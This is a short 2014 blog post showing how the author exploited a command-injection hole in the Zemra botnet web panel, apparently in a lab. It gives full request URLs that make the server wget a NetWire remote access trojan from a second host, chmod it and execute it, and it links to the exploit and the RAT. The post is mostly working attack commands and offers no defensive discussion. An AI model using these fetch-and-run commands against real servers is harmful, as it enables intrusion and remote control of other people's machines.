Wednesday, January 29, 2014

Zemra web panel hack with NetWIRE

Found a exploit for Zemra and used netwire to hack the Zemra web panel.

commands

wget downloads testlinux.out NetWire to the current directory http://192.168.56.141/zemra/system/
 http://192.168.56.141/zemra/system/command.php?cmd=wget http://192.168.56.207/testlinux.out



chmod 777 makes it possible to execute testlinux.out NetWire RAT
http://192.168.56.141/zemra/system/command.php?cmd=chmod 777 testlinux.out


./testlinux.out simply executes NetWire RAT
http://192.168.56.141/zemra/system/command.php?cmd=./testlinux.out

NetWire RAT:http://www.worldwiredlabs.com/netwire
Exploit:http://www.1337day.com/exploit/21663
My Video:http://youtu.be/w3Eo7HI8Bbk

No comments:

Post a Comment